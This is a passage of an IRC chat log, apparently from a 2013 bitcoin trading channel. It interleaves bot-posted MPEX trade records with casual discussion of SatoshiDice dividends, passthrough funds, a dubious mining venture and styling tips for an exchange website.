0.00064091 = 4.2435 BTC [+] Jan 03 22:58:06 [MPEX] [S.MPOE] 1996 @ 0.00064712 = 1.2917 BTC [+] Jan 03 22:58:07 [MPEX] [S.MPOE] 31083 @ 0.00065 = 20.204 BTC [+] Jan 03 22:58:08 [MPEX] [O.BTCUSD.P150T] 1 @ 0.19862955 BTC [-] Jan 03 22:58:26 smickles, how much? Jan 03 22:58:36 http://ukoki.com/post/39581957287/the-diy-hedge-fund-analysing-wikipedia-edits-as-a Jan 03 22:58:40 jurov: heh, how much of what? Jan 03 22:58:45 teh ppusd Jan 03 22:58:56 "I won 16 BTC on satoshidice and promptly used it to buy S.DICE stock. Already made over 1 BTC on dividends." Jan 03 22:58:58 ahaha total win Jan 03 22:59:01 oh, 56.42 Jan 03 23:00:18 well, i just used sdice to touch up the balance for mpex deposit :P Jan 03 23:00:56 ended up with 1.6btc more, lol Jan 03 23:04:23 where can I see what the % dividend returns are on S.DICE? (dividend/share price) Jan 03 23:04:40 [MPEX] [O.BTCUSD.C120T] 1 @ 0.16972395 BTC [-] Jan 03 23:04:46 divide the number by 10,000,000 Jan 03 23:04:55 then divide by .0037 Jan 03 23:04:55 [MPEX] [O.BTCUSD.P120T] 1 @ 0.09098616 BTC [-] Jan 03 23:05:05 jurov: are you offering mpexbtc for ppusd? Jan 03 23:05:07 [MPEX] [O.BTCUSD.C130T] 1 @ 0.148 BTC [-] Jan 03 23:05:16 ;;calc 1720/10000000/.0037 Jan 03 23:05:21 0.0464864864865 Jan 03 23:05:21 [MPEX] [O.BTCUSD.P130T] 1 @ 0.132 BTC [-] Jan 03 23:05:37 [MPEX] [O.BTCUSD.C140T] 1 @ 0.113 BTC [-] Jan 03 23:05:48 [MPEX] [O.BTCUSD.P140T] 1 @ 0.168 BTC [+] Jan 03 23:05:50 still testing that options bot? Jan 03 23:06:02 [MPEX] [O.BTCUSD.C150T] 1 @ 0.07678775 BTC [-] Jan 03 23:06:12 smickles yes, for 0.1 BTC fee. but must figure out how much is avail Jan 03 23:06:26 blockchain.info is back Jan 03 23:07:00 Bugpowder: it's a one month test Jan 03 23:07:49 mircea_popescu I only see 6 deposits (450BTC) Jan 03 23:08:03 it might be due to the big reddit S.DICE story Jan 03 23:08:03 if you are interested in sending btc to it, I'll give you a fair share of profits/losses Jan 03 23:08:15 sorry smickles I'm building my own bot Jan 03 23:08:16 :) Jan 03 23:08:20 :) Jan 03 23:08:25 and I WILL BURY YOU Jan 03 23:08:46 smickles, 4BTC are definitely available ;) Jan 03 23:08:51 just like Khrushchev Jan 03 23:10:14 ;;ticker Jan 03 23:10:15 BTCUSD ticker | Best bid: 13.31571, Best ask: 13.33965, Bid-ask spread: 0.02394, Last trade: 13.31570, 24 hour volume: 18951.43361414, 24 hour low: 13.24897, 24 hour high: 13.46400, 24 hour vwap: 13.34623 Jan 03 23:10:39 ;;calc 4.1*13.464 Jan 03 23:10:44 55.2024 Jan 03 23:10:54 smickles here you are Jan 03 23:11:21 ;;calc 4.1*13.34623 Jan 03 23:11:22 54.719543 Jan 03 23:11:30 whatever Jan 03 23:12:38 [MPEX] [O.BTCUSD.C120T] 1 @ 0.16969705 BTC [-] Jan 03 23:12:51 [MPEX] [O.BTCUSD.P120T] 1 @ 0.09095926 BTC [-] Jan 03 23:13:14 [MPEX] [O.BTCUSD.C130T] 1 @ 0.148 BTC [-] Jan 03 23:13:27 [MPEX] [O.BTCUSD.P130T] 1 @ 0.132 BTC [-] Jan 03 23:16:36 Bugpowder, u gonna sell bonds? Jan 03 23:17:57 jurov: so 4.1 mpex btc for 54.72 ppusd? Jan 03 23:18:27 only 4.0 . the 0.1 is the fee Jan 03 23:19:23 ok, sounds reasonable for what I bought the ppusd at Jan 03 23:19:36 send me the address Jan 03 23:20:57 PMd Jan 03 23:21:34 jurov, probably not. Jan 03 23:22:05 with the TNX jump, I might actually pick up some more here. Jan 03 23:23:22 smickles, all done Jan 03 23:23:44 The 10-year treasury yield stayed below 3% from 1934 all the way till 1956. Jan 03 23:24:03 I'm sure the whole time people were thinking yields would rise any day now... Jan 03 23:26:29 Could take 20 years to deleverage through this K-winter Jan 03 23:42:22 alternatively, it could take 6 weeks. Jan 03 23:42:29 anyone;'s guess at this point. Jan 03 23:44:12 well no.. the deleveraging can't occur that fast, that opportunity came prior to the first big bank bailouts. However, yields could start going up within 6 weeks. Jan 03 23:46:08 why can't it happen that fast ? Jan 03 23:46:15 just write off all the us financial sector. Jan 03 23:46:22 presto, it's now deleveraged. Jan 03 23:46:39 debt jubilee (sp?) Jan 03 23:46:46 GNP on par with Chad for a decade or so, and all that. Jan 03 23:59:44 [MPEX] [S.MPOE] 16000 @ 0.0006338 = 10.1408 BTC [-] Jan 03 23:59:45 [MPEX] [S.MPOE] 12420 @ 0.00063258 = 7.8566 BTC [-] Jan 04 00:00:57 I love this. SOEBOT bidding higher and higher for things, MPOEBOT bidding lower and lower for things Jan 04 00:01:22 and never the twain shall meet Jan 04 00:03:12 heh, nifty, yet at the end of last month the prototype was bidding higher than mpoebot, so, if the pattern holds, the will eventually meet Jan 04 00:05:16 [MPEX] [S.DICE] 356 @ 0.00369999 = 1.3172 BTC [-] Jan 04 00:06:26 !ticker s.dice Jan 04 00:06:28 [MPEX:S.DICE] 1day: 0.00353735 / 0.00368492 / 0.0037 (146630 shares, 540.32 BTC), 30day: 0.0014 / 0.00328155 / 0.0037 (12922596 shares, 42,406.27 BTC) Jan 04 00:07:10 fund both bots with 5digit sums. watch hilarity ensue Jan 04 00:07:38 hilarity, or price stabilization Jan 04 00:07:58 ;ticker Jan 04 00:08:04 ;;ticker Jan 04 00:08:05 BTCUSD ticker | Best bid: 13.37513, Best ask: 13.39950, Bid-ask spread: 0.02437, Last trade: 13.37513, 24 hour volume: 18956.99709514, 24 hour low: 13.24897, 24 hour high: 13.46400, 24 hour vwap: 13.34900 Jan 04 00:08:06 ;;ticker Jan 04 00:08:06 BTCUSD ticker | Best bid: 13.37513, Best ask: 13.39950, Bid-ask spread: 0.02437, Last trade: 13.37513, 24 hour volume: 18956.99709514, 24 hour low: 13.24897, 24 hour high: 13.46400, 24 hour vwap: 13.34900 Jan 04 00:08:26 is that what happened to BTCUSD? Jan 04 00:09:51 oh want me to turn off my btcusd stabilization bots? Jan 04 00:09:54 sorry Jan 04 00:11:10 BTCUSD STABILIZATION ENGAGED Jan 04 00:11:58 actually, I use 11 digit sums Jan 04 00:12:41 mircea_popescu seems to use 'whatever' digit sums Jan 04 00:12:52 eh ? Jan 04 00:13:00 bot funding Jan 04 00:13:12 no digits in btc :D Jan 04 00:13:22 onlt toes Jan 04 00:14:15 http://www.youtube.com/watch?v=oWTgvRGwzWg Jan 04 00:23:16 Yes, I think one of the main issues is the assets being 'titled' in CoinBR's name and not the user's. Jan 04 00:23:25 ^ hard to argue with such "issues" Jan 04 00:24:12 url? Jan 04 00:24:16 mr. smickles Jan 04 00:24:18 'cause you know, all assets have the user's name in the title Jan 04 00:24:24 om Jan 04 00:24:26 pm Jan 04 00:24:29 thestringpuller: Howdy :) Jan 04 00:24:55 https://bitcointalk.org/index.php?topic=118551.20 Jan 04 00:25:32 "Hi Everyone, we've decided to launch our own S.DICE passthru fund on https://www.havelockinvestments.com/fund.php?symbol=SDICE " Jan 04 00:27:02 lol Jan 04 00:27:21 wut? http://www.nature.com/news/quantum-gas-goes-below-absolute-zero-1.12146 Jan 04 00:28:09 Bugpowder, do these two things have something in common? Jan 04 00:28:26 yes. Jan 04 00:28:32 I saw them sequentially Jan 04 00:28:41 like, "look s.dice passthrough, hell froze over" Jan 04 00:28:45 lol Jan 04 00:29:07 I wonder if this is like a really amazing breakthru or not Jan 04 00:30:04 it is maybe for overclockers Jan 04 00:31:07 cpu wont work under abs 0 Jan 04 00:31:27 they say some weird things Jan 04 00:31:41 like gravity affect reverses below zero Jan 04 00:32:21 ok i'll start a s.dice passthrough on btct.no Jan 04 00:32:49 if they would done the experiment in russia they would get a couple of billionths of a Kelvin lower Jan 04 00:33:11 pigeons, it's already there Jan 04 00:33:53 imma gonna open havelock sdice passthrogh on GLBSE Jan 04 00:34:29 kakobrekla: don't forget the mpex synth listing too Jan 04 00:34:42 i can't wait till they start duplicating our bonds passthrough, too Jan 04 00:34:46 yea yeah backpassthrough Jan 04 00:35:00 im gonna pass trhough to kak's PT via litecoinglobal Jan 04 00:35:13 lets do it! Jan 04 00:35:16 yo dawg Jan 04 00:36:05 Ukto, I have got genial idea. Let's make passthrough on bitfunder... to itself Jan 04 00:36:40 0,o Jan 04 00:36:47 the asset name shall be CoinBr.INCEPTION Jan 04 00:37:36 it's be like an eminem album about how his last albulm where he raps about his last album sucking sucked Jan 04 00:38:31 Ukto, you store plaintext passwords on bitfunder????!!!! Jan 04 00:38:52 no they are base64 encoded! Jan 04 00:38:56 no ? Jan 04 00:39:13 sorry i mixed something in my head Jan 04 00:39:22 -_- Jan 04 00:39:23 ROT13 Jan 04 00:39:35 passes are bcrypted Jan 04 00:40:17 just like dr. nefario reccomends Jan 04 00:40:33 lolz Jan 04 00:41:37 my bad. we had PM with ukto about my password and i conflated it. i vouch for bitfunder sound practices Jan 04 00:42:09 lol Jan 04 00:42:22 its those extra voices in your head Jan 04 00:42:26 mine confuse me sometimes too Jan 04 00:42:28 :P Jan 04 00:43:11 [MPEX] [O.BTCUSD.C120T] 1 @ 0.16976363 BTC [+] Jan 04 00:43:23 [MPEX] [O.BTCUSD.P120T] 1 @ 0.09048435 BTC [-] Jan 04 00:48:23 The Passthru Centipede Jan 04 00:55:23 heh, why did someone buy lots of G.SDICE on bitfunder _after_ div payment for 0.004? Jan 04 00:55:38 to make sure the div come Jan 04 00:55:41 ;> Jan 04 01:05:05 Bugpowder that's interesting... they never told me about it. Jan 04 01:06:08 G.SDICE ? Jan 04 01:06:22 omfg people need to come to standard names. what's g. ? galinaceae ? Jan 04 01:07:15 G is short for Gangsta, obviously Jan 04 01:08:15 it says Gamma SatoshiDice Pass Through Jan 04 01:08:44 ic. Jan 04 01:09:16 so did the havelook ppl issue any sort of proof they hold shares or anything ? Jan 04 01:10:27 [MPEX] [S.DICE] 500 @ 0.00367288 = 1.8364 BTC [-] Jan 04 01:10:28 [MPEX] [S.DICE] 2500 @ 0.00367289 = 9.1822 BTC [+] Jan 04 01:10:29 [MPEX] [S.DICE] 644 @ 0.00369999 = 2.3828 BTC [+] Jan 04 01:10:30 [MPEX] [S.DICE] 16356 @ 0.0037 = 60.5172 BTC [+] Jan 04 01:14:19 [MPEX] [S.MPOE] 11820 @ 0.00064999 = 7.6829 BTC [+] Jan 04 01:26:17 wow, I should pay more attention b/f letting my eyes widen like that. [s.dice] @ .0037 was not followed by [s.dice] @ .0064999 Jan 04 01:27:59 https://bitcointalk.org/index.php?topic=134568.0 Jan 04 01:29:12 [MPEX] [S.DICE] 1217 @ 0.00369999 = 4.5029 BTC [-] Jan 04 01:29:31 lmao Jan 04 01:29:55 wth is that '*' supposed to refer to? Jan 04 01:30:02 72 terra hash/s bitcoin mine. The hashing hardware consists of 1000 bASIC boards provided by BTCFPGA, LLC. Today’s network hashing power is 3 times lower than 72TH/s but this situation will change dramatically in the next 2 months before the deployment of the hardware. Jan 04 01:30:04 lmao fucking scam Jan 04 01:31:36 k Jan 04 01:31:42 i wont say my thoughts but... Jan 04 01:31:44 http://picostocks.com/businessplan/17 Jan 04 01:31:47 pic at bottom of page 4 Jan 04 01:32:12 does that make you think of any recent movie actors who played a great roll in a dc comics movie, who suicided? >,> Jan 04 01:32:51 whoops Jan 04 01:32:52 wrong char Jan 04 01:33:33 i was thinking https://www.google.com/search?q=dark+knight+rises+scarecrow&hl=en&tbo=d&source=lnms&tbm=isch&sa=X&ei=NRXmUK3SBOaA2wXQpoGoDQ&ved=0CAcQ_AUoAA&biw=1422&bih=769 Jan 04 01:33:38 just what the world needs more of! Jan 04 01:33:41 http://www.lendmecoin.com/ Jan 04 01:34:31 The venture has 1M shares. The minimum price is 0.06BTC per share so the minimum valuation of the project is 798k USD at an USD/BTC Jan 04 01:34:32 lol Jan 04 01:34:33 no, srsly. Jan 04 01:36:47 the business plan is interesting too.. they want to build 100kW datacenter. no prior experience Jan 04 01:36:55 heh. Jan 04 01:37:00 no proof of payment of basics Jan 04 01:37:06 tom isn't even selling that many Jan 04 01:39:50 [MPEX] [S.DICE] 283 @ 0.00369999 = 1.0471 BTC [-] Jan 04 01:39:51 [MPEX] [S.DICE] 29388 @ 0.0037 = 108.7356 BTC [+] Jan 04 01:46:14 100Kw datacenter isnt that much Jan 04 01:46:37 My 2,500 sqft facility was 600Kw Jan 04 01:47:03 your talking like.. 100amps @ 440v 3-phase. Jan 04 01:47:42 but if they have no prior experience in things yeah, thats alot Jan 04 01:48:39 they would need at least 30tons of HVAC tho... figure around $35k if using chilled water units... $100k+ for condensor systems Jan 04 02:06:32 https://bitcointalk.org/index.php?topic=104489.msg1433281#msg1433281 Jan 04 02:07:00 Ukto it's pure fantasy Jan 04 02:07:09 O_o Jan 04 02:07:13 1000 basics ? what 1000 basics ? basics are fully sold out on preorders and 300 projected anyway Jan 04 02:07:30 lol what's the story tghere Jan 04 02:07:51 mircea_popescu: I know Jan 04 02:07:56 kakobrekla: u like that? :P Jan 04 02:08:11 i dont care, i think bakewell is baked well Jan 04 02:08:17 hahaha Jan 04 02:08:23 he does do some crazy stuff Jan 04 02:08:40 [MPEX] [S.DICE] 17000 @ 0.0037 = 62.9 BTC [+] Jan 04 02:08:41 he surprised me with it as well Jan 04 02:08:45 yea put a sock on the head instead shoe Jan 04 02:15:04 so why the move ? Jan 04 02:15:06 is it sikrit ? Jan 04 02:19:25 [MPEX] [S.MPOE] 10000 @ 0.00063381 = 6.3381 BTC [-] Jan 04 02:20:11 he said he did not agree with the administration policies of btct Jan 04 02:20:12 thats all Jan 04 02:21:17 a ok Jan 04 02:26:29 [MPEX] [S.DICE] 1000 @ 0.00366001 = 3.66 BTC [-] Jan 04 02:26:31 [MPEX] [S.DICE] 1000 @ 0.0036527 = 3.6527 BTC [-] Jan 04 02:26:31 [MPEX] [S.DICE] 540 @ 0.00365269 = 1.9725 BTC [-] Jan 04 02:28:25 !help Jan 04 02:28:25 List of commands: Jan 04 02:28:26 !ticker (desc: returns current MPEX ticker values) Jan 04 02:30:27 whenever you are ready bud Jan 04 02:35:17 ;;ident honeybooboo Jan 04 02:35:18 Error: I am not seeing this user on IRC. If you want information about a registered gpg user, try the 'gpg info' command instead. Jan 04 02:39:03 [MPEX] [S.DICE] 2000 @ 0.00369999 = 7.4 BTC [+] Jan 04 02:39:04 [MPEX] [S.DICE] 700 @ 0.0037 = 2.59 BTC [+] Jan 04 02:42:30 [MPEX] [S.DICE] 1900 @ 0.00369999 = 7.03 BTC [-] Jan 04 03:05:30 hewwo Jan 04 03:05:40 when will S.DICE pay divs ? Jan 04 03:06:43 next month again Jan 04 03:06:47 Feb 1 Jan 04 03:06:50 or 2 Jan 04 03:08:23 If we project this months betting volume, it should be around 7.7%, plus or minus 5% Jan 04 03:09:15 well, when did it pay divs last time? Jan 04 03:09:30 jan 2 Jan 04 03:09:32 ok Jan 04 03:09:53 how much was it? Jan 04 03:10:07 %? Jan 04 03:10:48 i just received my divs - from a broker Jan 04 03:10:52 1720.64488847 BTC Jan 04 03:10:59 how much is it as %? Jan 04 03:11:22 ask your broker ;)O Jan 04 03:12:10 7%? Jan 04 03:12:21 Anduck about 5.2% ish Jan 04 03:12:21 =P Jan 04 03:12:24 aight Jan 04 03:12:30 mp Jan 04 03:12:37 150,000 bet so far this month Jan 04 03:12:43 lol Jan 04 03:12:44 so much Jan 04 03:12:46 jesus god. Jan 04 03:12:51 anduck : Jan 04 03:13:05 ;;calc 17206 satoshi per share Jan 04 03:13:06 Error: invalid syntax (, line 1) Jan 04 03:13:15 lol i mean, 17.2k satoshi per share Jan 04 03:13:29 ;;calc 150000*31/3*.019/.0037/10000000 Jan 04 03:13:29 0.795945945946 Jan 04 03:13:33 Bugpowder 150k this month ? what month ? these two days ? Jan 04 03:13:37 yes Jan 04 03:13:42 yep Jan 04 03:13:49 it's not staying 37 at this rate. Jan 04 03:13:54 three days Jan 04 03:14:02 mircea_popescu: "so much" was meant as "lol so much bet'd" Jan 04 03:14:07 its funny, s.dice return was 5.2%, mpbor was 4.99% Jan 04 03:14:14 basically, you can pcik your poison and make 5% a month. Jan 04 03:14:19 very different risks Jan 04 03:14:22 I have moved all my coins, except for the options I'm still selling into S.DICE Jan 04 03:14:31 no loss risk with S.DICE Jan 04 03:14:33 well Jan 04 03:14:38 equity risk Jan 04 03:14:41 if Erik gets arrested Jan 04 03:14:51 but that is like probably 2 years away Jan 04 03:15:47 it could have 0 divs Jan 04 03:15:55 and a lump to pay for next month Jan 04 03:16:01 so yea, very diff risk profiles. Jan 04 03:16:28 yeah but MBOPR lost 45% one month Jan 04 03:16:36 that requires 90% gain to recover from Jan 04 03:16:46 whats MBOPR? Jan 04 03:17:15 MPBOR Jan 04 03:17:17 sorry Jan 04 03:17:28 what is it? Jan 04 03:17:34 asset for what? Jan 04 03:17:50 bonds backing the options market making bot on MPEX Jan 04 03:18:18 yea also true. Jan 04 03:18:23 then again... what's more likely ? Jan 04 03:18:46 is past prelude? Jan 04 03:19:02 I think MBPOR is probably a good investment Jan 04 03:19:14 at 5% Jan 04 03:19:35 but I think S.DICE, at this valuation, is better Jan 04 03:19:46 due to immenent equity price rise Jan 04 03:20:14 i think so too, it's been pent up for too long Jan 04 03:20:33 its unlikely current price reflects true market valuation, and it's unlikely that true valuation be on the lower end Jan 04 03:20:38 since it was free moving on the lower end Jan 04 03:20:56 yup Jan 04 03:21:02 wholey crap Jan 04 03:21:11 i posted my s.dice shares @ 0.0050/share Jan 04 03:21:13 just to put up a wall Jan 04 03:21:16 someone bought them Jan 04 03:21:24 well, a quarter Jan 04 03:21:37 heh. Jan 04 03:21:39 amazing what price discovery will find Jan 04 03:21:45 when there is no IPO wall Jan 04 03:21:49 ya. Jan 04 03:21:59 mebbe i will raise my price heh Jan 04 03:21:59 .005 seems a bit cheap Jan 04 03:22:01 and the thing is, AFTER ipo sells out, which hasn't happened yet, there's 30 days lockdown Jan 04 03:22:15 ?? Jan 04 03:22:25 no secondary issuing? Jan 04 03:22:33 for 30 days? or what? Jan 04 03:22:36 yea. Jan 04 03:22:52 (c)The representatives of SatoshiDice warrant that no further shares will be offered by them for a period of 30 days from the date these offered shares are sold. Jan 04 03:23:07 A secondary at .0075 would be reasonable Jan 04 03:23:45 erik's call Jan 04 03:23:49 tempted to open my physicals Jan 04 03:23:51 well, and all the shareholder's obviously. Jan 04 03:23:56 and deposit more Jan 04 03:24:14 well... if mpex tempts then mpex has succeeded. Jan 04 03:25:16 800BTC to go Jan 04 03:34:56 http://www.businessweek.com/articles/2013-01-03/bitcoin-making-online-gambling-legal-in-the-u-dot-s-dot Jan 04 03:35:28 "Erik Voorhees, director of marketing and communications at BitInstant, helped design SatoshiDice, a gambling site hosted in Ireland and owned by an anonymous investor. " Jan 04 03:35:45 O-o Jan 04 03:38:10 "Silk Road, which processes an estimated $1.2 million a month in sales of illegal drugs" Jan 04 03:38:14 thats a pretty amazing number Jan 04 03:38:24 i guess if you include memberships fees Jan 04 03:38:29 that would make up 50% of it Jan 04 03:38:30 :P Jan 04 03:38:35 mebbe they havent SEEN silkroad. Jan 04 03:38:48 it takes about 5 minutes of effort to get there Jan 04 03:39:02 Ukto: find dat ff7 yet? Jan 04 03:39:05 its media, and based on the comment, tehy did not look Jan 04 03:39:17 thestringpuller: i uh no Jan 04 03:39:17 -_- Jan 04 03:40:05 heheeh Jan 04 03:40:08 I imagine the street value is actually much higher than 1.2MM Jan 04 03:40:13 "Gavin Andresen, chief scientist at Bitcoin Foundation" Jan 04 03:40:16 whered that title come from? 0,o Jan 04 03:40:23 its why the foundation exists lol Jan 04 03:40:28 exactly Jan 04 03:40:33 it helps with the mainstream PR Jan 04 03:40:40 oh heh Jan 04 03:42:27 this conversation isn't helping me get my ff7 Jan 04 03:48:40 new whale? 013-01-04 00:45:25 lessthan 32768 6b535440 d96ed541 1AnixjB CONFIRMED 400.00000000 ABOVE MAX 400.00000000 59773 Jan 04 03:53:28 heh' Jan 04 03:57:40 75 huh ? Jan 04 03:57:44 that'd be a 100% gain and more. Jan 04 04:10:23 https://bitcointalk.org/index.php?topic=35775.msg1432008#msg1432008 Jan 04 04:16:02 lol Jan 04 04:17:59 was also usagi bait too Jan 04 04:23:14 wow Jan 04 04:23:20 is it just me or is bitfunder's color scheme hideous Jan 04 04:26:13 http://www.forbes.com/forbes/2011/0509/technology-psilocybin-bitcoins-gavin-andresen-crypto-currency.html <-- how i think of gavin Jan 04 04:26:22 gladoscc: its horrid Jan 04 04:26:40 you should post in the bitfunder thread with a suggestion to redo it with Jan 04 04:27:54 mebbe there can be a coloscheme selector for people Jan 04 04:28:03 do all kinda colors sets.. 'sunset' etc Jan 04 04:28:05 cust background images Jan 04 04:28:12 like the failed IE skins Jan 04 04:28:24 maybe you know Jan 04 04:28:32 ooh nice - he has aussie $20 ijn front - propably coz its worth more than a usd :P Jan 04 04:28:32 LOOK at your site before going to colorpicker.com Jan 04 04:28:40 picking two random colors that are close Jan 04 04:28:46 and completely disregard color theory Jan 04 04:29:24 defenitely did not follow any color theory Jan 04 04:29:40 which two random colors that are close are you reffering to? Jan 04 04:29:46 and I dont recall going to colorpicker hehe Jan 04 04:30:01 Ukto: you developed bitfunder? Jan 04 04:30:07 Yes. :) Jan 04 04:30:13 Changes / ideas are always welcome. Jan 04 04:30:16 :o Jan 04 04:30:48 not all programmers/deveopers have a good eye for colour Jan 04 04:30:49 :D Jan 04 04:30:55 thas defenitely not me Jan 04 04:30:59 hehe Jan 04 04:31:03 :P Jan 04 04:31:09 if it makes you happy, I may even let people make a 'custome' color set Jan 04 04:31:25 Ukto: try this -webkit-linear-gradient(top,#1282C0,#0817CA); Jan 04 04:31:36 chrome, select element, change navbar-inner. looks much better. Jan 04 04:32:09 weird, pretty sure i used webkit linear gadients Jan 04 04:32:14 well, at least at the top bar Jan 04 04:32:22 stil debating making it solid blue Jan 04 04:32:40 no, I mean, different colors Jan 04 04:32:50 [MPEX] [S.DICE] 400 @ 0.00367857 = 1.4714 BTC [-] Jan 04 04:32:51 [MPEX] [S.DICE] 308 @ 0.00365465 = 1.1256 BTC [-] Jan 04 04:32:53 [MPEX] [S.DICE] 1297 @ 0.0036527 = 4.7376 BTC [-] Jan 04 04:32:57 current one looks like... Geocities. Jan 04 04:32:59 You get what I mean? Jan 04 04:33:26 All you need is 5 'UNDER CONSTRUCTION' GIFs, a neon hit counter and "Best viewed in Internet Explorer 4" Jan 04 04:33:27 solid blue.... METRO Jan 04 04:33:33 metro sucks Jan 04 04:33:34 Jan 04 04:33:36 especially if you're using bootstrap. Jan 04 04:34:01 .. that. would be epic Jan 04 04:34:10 speaking of which, I need to get back to working on my project instead of procrastinating. Jan 04 04:36:48 [MPEX] [S.MPOE] 18105 @ 0.000633 = 11.4605 BTC [-] Jan 04 04:37:27 gladoscc: there you go Jan 04 04:37:39 but now it draws out the black borderlines between nav buttons :P Jan 04 04:38:29 so by 'horrid' earlier, you simply ment the gradient ? :P Jan 04 04:39:07 yep :P, border-right: 1px solid blah; border-left: 1px solid blah; if you want to change the black gradients Jan 04 04:39:17 also are you aware that the active class is applied to home even if you're on another page? Jan 04 04:39:31 honestly Jan 04 04:39:31 no Jan 04 04:39:34 :P Jan 04 04:39:39 i will fix it up in a bit Jan 04 04:39:53 trying to push on the interactive api docs atm Jan 04 04:40:28 I like how the site is responsive Jan 04 04:40:40 its prolly slow atm heh Jan 04 04:40:50 "honestly no" to ? Jan 04 04:40:51 doing some extracarricular activity on the server atm Jan 04 04:40:56 to the home active class Jan 04 04:41:02 bootstrap must be fucking up somewhere Jan 04 04:41:18 or i set it somewhere Jan 04 04:41:21 you did Jan 04 04:41:27 I encountere the same thing on my site literally 2 hours ago Jan 04 04:41:34 so. Jan 04 04:41:37 you sure is active? Jan 04 04:41:42 it doesnt seem to highlight it Jan 04 04:41:53 at least not on the market page Jan 04 04:42:02 gladoscc: how do you like the mpex colors? Jan 04 04:42:15 pigeons: LOL Jan 04 04:42:19 heh Jan 04 04:42:20 pigeons: lol Jan 04 04:42:20 I wasnt going to go there :P Jan 04 04:42:36 Ukto: it is active in chrome, when logged out Jan 04 04:42:50 Jan 04 04:42:51 weird Jan 04 04:42:53 it does remain active Jan 04 04:42:55 when logged out Jan 04 04:42:58 i will check that later Jan 04 04:43:06 yeah i see the same Jan 04 04:43:08 probably because you're matching /, so /terms would return true Jan 04 04:43:11 home is always active Jan 04 04:43:22 nah, not how it works Jan 04 04:43:29 but Jan 04 04:43:45 i need to find a capable gfx guy to make a nice icon for the site. Jan 04 04:43:49 < Jan 04 04:43:52 was thinking of doing a blue b like from that reminds me.. i need Jan 04 04:43:54 er Jan 04 04:43:54 :) Jan 04 04:43:58 like from http://blogs-images.forbes.com/thumbnails/blog_2060/pt_2060_531_o.jpg?t=1343857647 Jan 04 04:44:03 but it needs to be stylized.. Jan 04 04:44:11 a solid color looks like ass Jan 04 04:44:28 I could do that for a few coins Jan 04 04:44:33 mebbe somehow show the F within the B Jan 04 04:44:41 since you can fit an F into it Jan 04 04:44:58 Ukto: you can, but it's going to look ugly cause B is curved/rounded Jan 04 04:45:03 yeah Jan 04 04:45:11 the B can be reshaped a bit for that tho Jan 04 04:45:16 and unless you want F to look like |c Jan 04 04:45:17 and it makes sense to do it that way Jan 04 04:45:45 besides, if I dont add the F... it looks more like glbse's old logo Jan 04 04:45:50 do it like this: http://www.berkshirehathaway.com/ Jan 04 04:46:02 lol Jan 04 04:46:06 prehaps do it like facebook.com Jan 04 04:46:10 except obviously not using the facebook font. Jan 04 04:46:29 yeah but i cant fucking stand those facebook colors for real Jan 04 04:47:04 pigeons: did you see my earlier comments about pre-made tempaltes and user customizations? :P Jan 04 04:47:17 I was half serious about putting skine dthemes together :P Jan 04 04:47:23 a nice beach sunrise in the background Jan 04 04:47:24 >:P~ Jan 04 04:47:27 Ukto: hope you're really half serious Jan 04 04:47:31 cause userscripts. Jan 04 04:47:49 honestly, something like that would be alot more work than I have time for atm ;) Jan 04 04:48:24 I need to Jan 04 04:48:27 actually develop something myself Jan 04 04:49:00 but the last thing we need is another exchange Jan 04 04:49:12 so how about you be creative for a logo icon, somethign that can be made into a nice looking favicon also, and if i like it, we can talk price ? Jan 04 04:52:10 Ukto: I'm working on another project for someone at the moment, I think I'll do that first anyways. Jan 04 04:52:23 thats fine. :) thanks for the offer Jan 04 04:57:45 Ukto: ff7 :P Jan 04 04:58:02 dmnit Jan 04 04:58:03 :P Jan 04 04:58:11 any cobra to eat? Jan 04 04:58:30 You've been stung stupid. Jan 04 05:02:41 oh, ok. back to sleep Jan 04 05:03:25 with 22 confirmations on a coinbr deposit yet no funding ..... Jan 04 05:05:21 [MPEX] [S.MPOE] 4700 @ 0.00063259 = 2.9732 BTC [-] Jan 04 05:12:57 [MPEX] [S.MPOE] 26800 @ 0.000633 = 16.9644 BTC [+] Jan 04 05:13:40 [MPEX] [S.DICE] 919 @ 0.00369999 = 3.4003 BTC [+] Jan 04 05:15:24 [MPEX] [S.DICE] 181 @ 0.00369999 = 0.6697 BTC [+] Jan 04 05:15:26 [MPEX] [S.DICE] 26119 @ 0.0037 = 96.6403 BTC [+] Jan 04 05:18:13 honeybadger: do you know why a coinbr deposit might take that long? Jan 04 05:18:50 I don't think they keep a floating balance on mpex, so any deposit has to wait on the manual deposit process of mpex Jan 04 05:19:26 hey mircea_popescu, you don't even like dark bitter beer? Jan 04 05:19:55 mickles, I think they have to be manually approved and someone is sleeping? Jan 04 05:20:20 i don't hate it at least. Jan 04 05:28:29 [MPEX] [S.DICE] 3025 @ 0.0037 = 11.1925 BTC [+] Jan 04 06:05:14 [MPEX] [S.DICE] 1203 @ 0.0036527 = 4.3942 BTC [-] Jan 04 06:05:14 [MPEX] [S.DICE] 97 @ 0.00365269 = 0.3543 BTC [-] Jan 04 06:19:54 [MPEX] [S.DICE] 170 @ 0.00365269 = 0.621 BTC [-] Jan 04 06:19:55 [MPEX] [S.DICE] 173 @ 0.00364994 = 0.6314 BTC [-] Jan 04 06:32:54 hi mircea_popescu Jan 04 06:33:07 hi. Jan 04 06:54:22 ;;tslb Jan 04 06:54:23 Oh wow. "Paid Content This article is available for a fee. Articles published on Trilema are available based on a credits system." Jan 04 06:54:33 Time since last block: 28 minutes and 24 seconds Jan 04 06:54:33 yea... Jan 04 06:55:21 [MPEX] [S.DICE] 1057 @ 0.00362779 = 3.8346 BTC [-] Jan 04 06:55:22 [MPEX] [S.DICE] 393 @ 0.00367396 = 1.4439 BTC [+] Jan 04 06:56:36 I have a feeling it'd cost more time to process payments for $1. Jan 04 06:59:44 [MPEX] [S.DICE] 176 @ 0.00367396 = 0.6466 BTC [+] Jan 04 06:59:45 [MPEX] [S.DICE] 874 @ 0.0037 = 3.2338 BTC [+] Jan 04 07:08:25 ;;tslb Jan 04 07:08:28 Time since last block: 1 minute and 53 seconds Jan 04 07:11:23 !ticker s.mpoe Jan 04 07:11:25 [MPEX:S.MPOE] 1day: 0.00063258 / 0.00063932 / 0.00065 (225899 shares, 144.42 BTC), 30day: 0.00050643 / 0.00059349 / 0.00066 (62728158 shares, 37,229.09 BTC) Jan 04 07:20:23 [MPEX] [S.DICE] 2400 @ 0.00361595 = 8.6783 BTC [-] Jan 04 07:26:21 ;;tslb Jan 04 07:26:24 Time since last block: 3 minutes and 21 seconds **** BEGIN LOGGING AT Fri Jan 4 16:10:38 2013 Jan 04 16:21:17 [MPEX] [S.DICE] 550 @ 0.00366925 = 2.0181 BTC [+] Jan 04 